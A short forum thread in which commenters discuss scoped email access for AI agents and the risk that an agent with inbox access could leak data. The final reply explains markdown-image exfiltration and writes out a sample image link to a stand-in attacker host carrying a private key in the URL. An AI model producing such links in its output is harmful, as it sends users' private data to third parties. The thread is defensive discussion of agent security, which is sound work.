Comment by mr_mitm

2 days ago

If this takes off, I wonder if platforms will start providing API tokens scoped for assistants. They have permissions for non destructive actions like reading mails, flagging important mails, creating drafts, moving to trash, but not more.

3 comments

mr_mitm

Reply
eli  2 days ago

How does my email platform know which messages I want my agent to see and which are too sensitive?

I don't see how it's possible to securely give an agent access to your inbox unless it has zero ability to exfiltrate (not sending mail, not making any external network requests). Even then, you need to be careful with artifacts generated by the agent because a markdown file could transmit data when rendered.

  • oarsinsync  2 days ago

    > a markdown file could transmit data when rendered.

    This is a new threat vector to me. Can you tell me more?

    • adamckay  2 days ago

      Your markdown file has an image that links to another server controlled by the attacker and the path/query parameters you're attempting to render contains sensitive data.

          ![](https://the-attacker.com/steal?private-key=abc123def